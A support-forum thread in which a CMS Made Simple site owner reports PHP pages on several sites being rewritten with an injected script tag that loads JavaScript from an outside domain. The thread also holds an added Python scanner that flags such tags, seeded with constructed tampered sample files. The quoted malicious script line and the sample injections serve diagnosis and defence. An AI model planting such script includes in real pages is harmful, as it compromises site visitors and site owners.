JavaScript Injection on various PHP pages

For questions and problems with the CMS core. This board is NOT for any 3rd party modules, addons, PHP scripts or anything NOT distributed with the CMS made simple package itself.
Post by minneapolisite »

Over the past two weeks I have had several of my CMS MS sites hacked. Whatever it is, it's inserting a <script> tag at the head of my PHP files (for sure index.php, admin/login.php, and admin/index.php, possibly more that I haven't found yet).

The scripts always look like this, but with a different path every time.

Code:

<script type="text/javascript" src="http://dveri-plus.com.ua/facebook.php"></script>

Googling the various paths has not helped me find a resolution yet.

For my own site (hosted on 1and1.com) I deleted my entire CMS MS install (including the old SQL database) and reinstalled the most recent version. I implemented most of the security suggestions in this sticky thread. (I do not have access/skills to make the Apache/PHP.ini modifications.)

For one of my client sites (hosted on justhost.com) I deleted my entire CMS MS install (but kept the old SQL database) and reinstalled the most recent version. I did not implement additional security measures (planned to do that today, but it was already hit overnight.)

The very next day the hack repeated itself. :(

I'm an HTML/CSS expert, but a SQL/PHP novice. Has anyone else seen this hack, or something like it? Any suggestions on how I can prevent it?

It's possible this isn't a CMS MS issue (it also happened to an instance of Expression Engine stored alongside CMS MS) but the only pattern I see so far is that it's happened on servers on which I have CMS MS installed (no other similarities between the sites/servers.)
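
A check for the pattern described in the post above, added here as an example (it is not from the thread or from CMS Made Simple): it walks a site directory and reports any *.php file that has a script tag with an external src before its first PHP open tag. The function names, the allowed_hosts parameter, and the sample files and hosts (injected.example, cdn.example) are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# <script> tag whose src is an absolute http(s) URL (pattern from the post).
SCRIPT_SRC = re.compile(
    r'<script\b[^>]*\bsrc\s*=\s*["\']?(https?://[^"\'\s>]+)', re.IGNORECASE)
PHP_OPEN = re.compile(r'<\?')  # matches <?php, <?= and short <? tags

def injected_head_scripts(text, allowed_hosts=()):
    """Return external script URLs found before the first PHP open tag."""
    m = PHP_OPEN.search(text)
    head = text if m is None else text[:m.start()]
    return [u for u in SCRIPT_SRC.findall(head)
            if urlparse(u).hostname not in allowed_hosts]

def scan_tree(root, allowed_hosts=()):
    """Map each *.php file under root (relative path) to its suspicious URLs."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*.php")):
        text = path.read_text(encoding="utf-8", errors="replace")
        hits = injected_head_scripts(text, allowed_hosts)
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings

def build_sample_tree(root):
    """Constructed sample install: two tampered files and one clean file."""
    tag = '<script type="text/javascript" src="http://injected.example/%s"></script>'
    files = {
        "index.php": tag % "a.php" + '<?php echo "home";',
        "admin/login.php": tag % "b.php" + '<?php echo "login";',
        # Script emitted by the page's own PHP code: not at the head.
        "lib/clean.php": '<?php echo \'<script src="http://cdn.example/app.js"></script>\';',
    }
    for name, body in files.items():
        target = Path(root) / name
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_tree(tmp)

if __name__ == "__main__":
    for name, urls in demo().items():
        print(name, urls)
```

Running scan_tree on a schedule against the web root, and comparing the result with the previous run, shows which files were rewritten and when, which helps narrow down how the files are being modified.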

Re: JavaScript Injection on various PHP pages

Post by M@rtijn »

We have not seen this hack before, so I myself don't think it's related to CMSMS.

Did you change passwords and database connections between the first and second hack?
Is your computer spyware (keylogger) free?
Are there any other websites on the same host that are having the same problem?
Make your community a better place!

Re: JavaScript Injection on various PHP pages

Post by minneapolisite »

Thanks for the fast reply.

My computer possibly had keyloggers on it at one point, but it is clean now (I have recently run the latest version of Spybot S&D and Malwarebytes Anti-Malware, and run Symantec Anti-Virus at all times. I just re-ran Spybot this morning to double-check and it came up clean.)

On the client site, I reused the old database with the old password. (Whoops.)

On my own site I most definitely changed database connections/passwords, since I completely deleted the old database and created a new one with a new name, username, and password. I also definitely created this new database and new CMS MS install when my computer was keylogger free.

Something new in my life: I am running Apache and PHP on my PC and opened up port 81 to do so. However, I'm not sure how this would affect a site that I hadn't even visited in months, much less FTPed or logged in to. :/